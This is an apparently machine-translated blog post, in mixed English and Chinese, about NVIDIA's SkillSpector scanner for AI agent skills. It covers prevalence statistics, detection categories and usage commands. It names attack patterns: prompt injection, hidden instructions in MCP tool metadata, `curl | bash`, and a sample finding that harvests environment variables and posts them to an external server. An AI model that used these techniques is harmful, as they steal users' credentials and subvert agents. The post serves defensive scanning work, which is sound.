NVIDIA open source SkillSpector: Before installing AI Agent skills, ask if it is safe

Recommended Feeds

Google DeepMind News

Visual Studio Blog

MIT News - Artificial intelligence

让小产品的独立变现更简单 - ezindie.com

小众软件

博客园 - iTech

NVIDIA open source SkillSpector: Before installing AI Agent skills, ask if it is safe

iTech · 2026-06-19 · via 博客园 - iTech

The "npm moment" of Agent skills

Remember the early supply chain attacks in the npm ecosystem? Someone posted a message called event-stream was taken over by a malicious defender and quietly injected with the code to steal Bitcoin, which was discovered after millions of downloads.

The skill ecosystem of AI Agents is experiencing the same problem, or even more serious.

The reason is simple:An agent skill is not just referenced by your code, it runs directly in the agent's execution environment and has full permissions of the agent. When Claude Code loads a skill, every Markdown instruction and every Python script in that skill gain the same file system access, network access, and tool call rights as you.

In June 2026, NVIDIA released SkillSpector, an open source tool specifically designed to scan the security of Agent skills. It has only one question to answer:"Is this skill safe to install?"

A disturbing set of numbers

SkillSpector 的背后是一项大规模实证研究：来自 Liu et al.（2026）的论文《Agent Skills in the Wild: An Empirical Study of Security Vulnerabilities at Scale》。

The study scanned data from major markets 42,447 real skills, found that:

26.1% skills contain at least one flaw
5.2% skills with clear malicious intent
Skills that contain executable scripts, and the possibility of vulnerabilities is purely Markdown skills. 2.12 times

A quarter. More than a quarter of Agent skills have security issues.

This means that if your Agent has 10 skills installed, statistically at least 2-3 of them are vulnerable. One of these may be a deliberate malicious skill-stealing your API keys, monitoring your conversation context, or sending your system prompt words to an external server.

What did SkillSpector do?

SkillSpector uses a two-stage inspection pipeline:

Stage 1: Static analysis (fast, high recall)

Regular matching and AST analysis were performed through 11 static analyzers:

Regular pattern matching: Detecting known hazard code patterns
AST Behavioral Analysis: Testing exec()、eval()、subprocess、os.system Wait for dangerous calls
Dependent vulnerability query: Query known CVE in real time through OSV.dev(no API Key required)
YARA Rule Matching: Detection of Known Malware Signatures

Stage 2: LLM Semantic Analysis (optional, high-precision)

Submit the static analysis results to LLM for secondary evaluation:

Understand context and intent (not all os.environ All malicious)
Filter false positives (accuracy increased to approximately 87%)
Generating human-readable explanations

LLM's prompt has built-in anti-jailbreak protection to prevent malicious skills from manipulating the analysis process.

Supported LLM providers:
- OpenAI(Default gpt-5.4)
- Anthropic(Default claude-opus - 4 - 6)
- NVIDIA build.nvidia.com（默认 deepseek-v4-flash）
- 本地模型：Ollama、vLLM、llama.cpp 等 OpenAI 兼容端点

64 种漏洞模式，16 大类别

SkillSpector 检测的漏洞类型覆盖非常全面：

直接攻击类

类别	模式数	典型威胁
Prompt Injection	5	指令覆盖、隐藏指令、上下文外泄
Data Exfiltration	4	环境变量收割、文件系统枚举、数据传输
Privilege Escalation	3	过度权限、sudo 执行、凭证访问
Supply Chain	6	未固定版本依赖、`curl \\| bash`、混淆代码、已知 CVE

Agent 特有类

类别	模式数	典型威胁
Excessive Agency	4	无限制工具访问、自主决策、范围蔓延
System Prompt Leakage	3	直接泄露、间接提取、工具外泄
Memory Poisoning	3	持久化上下文注入、记忆篡改
Rogue Agent	2	自修改代码、未授权的持久化（cron/startup）
Tool Misuse	3	Parameter abuse, chain bypass, unsafe default values
Trigger Abuse	3	Too broad triggers, shadow command triggers

code-level analysis

category	mode number	typical threats
Behavioral AST	8	exec/eval calls, dynamic imports, dangerous execution chains
Taint Tracking	5	Certificate leakage chain, file → network leakage, external input → code execution
YARA Signatures	4	Malware matching, Webshell, miners, hacking tools

MCP protocol class

category	mode number	typical threats
MCP Least Privilege	4	Undeclared capabilities, wildcard permissions, overdeclared permissions
MCP Tool Poisoning	4	Hidden instructions in metadata, Unicode spoofing, parameter injection

5 minutes to get started

installation

git clone https://github.com/NVIDIA/SkillSpector.git
cd SkillSpector

# 创建虚拟环境
uv venv .venv && source .venv/bin/activate

# 安装
make install

Or use Docker without installing Python:

Scan for a skill

# 扫描本地目录
skillspector scan ./my-skill/

# 扫描单个 SKILL.md 文件
skillspector scan ./SKILL.md

# 扫描 Git 仓库
skillspector scan https://github.com/user/my-skill

# 扫描 zip 包
skillspector scan ./my-skill.zip

# 仅静态分析（不使用 LLM）
skillspector scan ./my-skill/ --no-llm

Docker approach

docker run --rm -v "$PWD:/scan" skillspector scan ./my-skill/ --no-llm

output format

# 终端输出（默认，美化格式）
skillspector scan ./my-skill/

# JSON（机器可读）
skillspector scan ./my-skill/ --format json --output report.json

# Markdown（文档用）
skillspector scan ./my-skill/ --format markdown --output report.md

# SARIF（CI/CD 集成）
skillspector scan ./my-skill/ --format sarif --output report.sarif

Risk scoring system

SkillSpector generates a risk score of 0-100 for each skill:

CRITICAL problems:+50 points
HIGH issue:+25 points
MEDIUM Question:+10 points
LOW Question:+5 points
Contains executable scripts: ×1.3 times multiplier

score	risk level	recommendations
0-20	LOW	safe installation
21-50	MEDIUM	used with caution
51-80	HIGH	Installation is not recommended
81-100	CRITICAL	Never install it

A real scan result

Check out SkillSpector's report on a questionable skill:

SkillSpector Security Report  v2.0.0

Skill: suspicious-skill
Source: ./suspicious-skill/

        Risk Assessment
 Score           78/100
 Severity        HIGH
 Recommendation  DO NOT INSTALL

Issues (2)

  HIGH: Env Variable Harvesting (E2)
    Location: scripts/sync.py:23
    Finding: for key, val in os.environ.items():...
    Confidence: 94%
    Explanation: This code collects environment variables containing
    API keys and secrets, then sends them to an external server.

  HIGH: External Transmission (E1)
    Location: scripts/sync.py:45
    Finding: requests.post("https://api.skill.io/env"...
    Confidence: 89%
    Explanation: Data is being sent to an external server. Combined
    with env harvesting above, this indicates credential exfiltration.

This skill is ostensibly a "data synchronization" tool, but the actual code is collecting all environment variables (including your API keys) and sending them to external servers. Score 78 points, HIGH level, and clearly recommend "Do not install".

Access CI / CD

The SARIF format allows SkillSpector to seamlessly connect to your CI processes:

# 在 CI 中扫描所有技能
skillspector scan ./skills/ --format sarif --output report.sarif

GitHub Actions, GitLab CI, etc. all natively support security scanning reports in SARIF format. Automatic scanning is performed every time a PR is submitted, and high-risk skills are found to directly block the merger.

Python APIs can also be integrated into your tool chain:

from skillspector import graph

result = graph.invoke({
    "input_path": "/path/to/skill",
    "output_format": "json",
    "use_llm": True,
})

if result["risk_score"] > 50:
    raise RuntimeError(f"Skill failed security check: {result['risk_severity']}")

MCP security: A new area worthy of attention

SkillSpector specifically adds security detection for the MCP (Model Context Protocol) protocol. MCP is becoming the standard protocol for agents to connect to external services, but it also brings a new attack surface:

Tool poisoning: Embed hidden instructions in tool metadata (HTML comments, zero-wide characters, Base64 encoding)
Unicode spoofing: Use homomorphic characters, RTL overrides, mixed scripts to disguise identifiers
parameter description injection: Inject malicious content into parameter definitions
Minimum authority violation: Code uses capabilities not listed in the declaration

These attack methods are rare in traditional software security, but can be fatal in the Agent ecosystem.

limitations

SkillSpector is a powerful first line of defense, but it also has boundaries:

Non-English content: Attack patterns that may miss other languages
image attack: Unable to analyze text in pictures
Encryption/binary code: Unable to analyze compiled or encrypted content_
Run-time behavior_: Static analysis only, no dynamic execution
Offline mode: SC4 relies on OSV.dev web access, Downgraded to a static list when offline_

Why is this important_

_The threat model of Agent skills is highly similar to npm supply chain attacks:

Implicit trust_: Agents give implicit trust to the skills they install, just like the npm package gets full permissions of the process after it is installed_
Audit is missing: Most marketplaces do not have a strict security review process
have a widespread impact: A malicious skill can steal credentials, monitor conversations, inject instructions, and tamper with files
see the barriers: Malicious behavior may be hidden behind normal functional descriptions and is difficult for users to detect

The difference is that Agent skills have a larger attack surface than npm. The npm package affects your Node.js process, and the Agent skills affect your AI Agent-it can operate your file system, access your mail, modify your calendar, and even send messages on your behalf.

Before installing any Agent skills, run SkillSpector. This is not an option, it is a basic health requirement for Agent development in 2026.

author: itech001
source: Public Account: AI Artificial Intelligence Era
website: _ _ JHSNS _ URL _ 0 _ _
Share the most cutting-edge AI news and technical research every day.

This article was first published in the era of AI artificial intelligence. Please indicate the source for reprinting.

Reference source:
- NVIDIA/SkillSpector | GitHub
- Agent Skills in the Wild: An Empirical Study of Security Vulnerabilities at Scale (Liu et al., 2026)
- NVIDIA ships open-source scanner for agent skill supply-chain risk | AI Insiders

This content is automatically aggregated by InertiaRSS (RSS Reader) for reading reference only. Original from — Copyright belongs to the original author.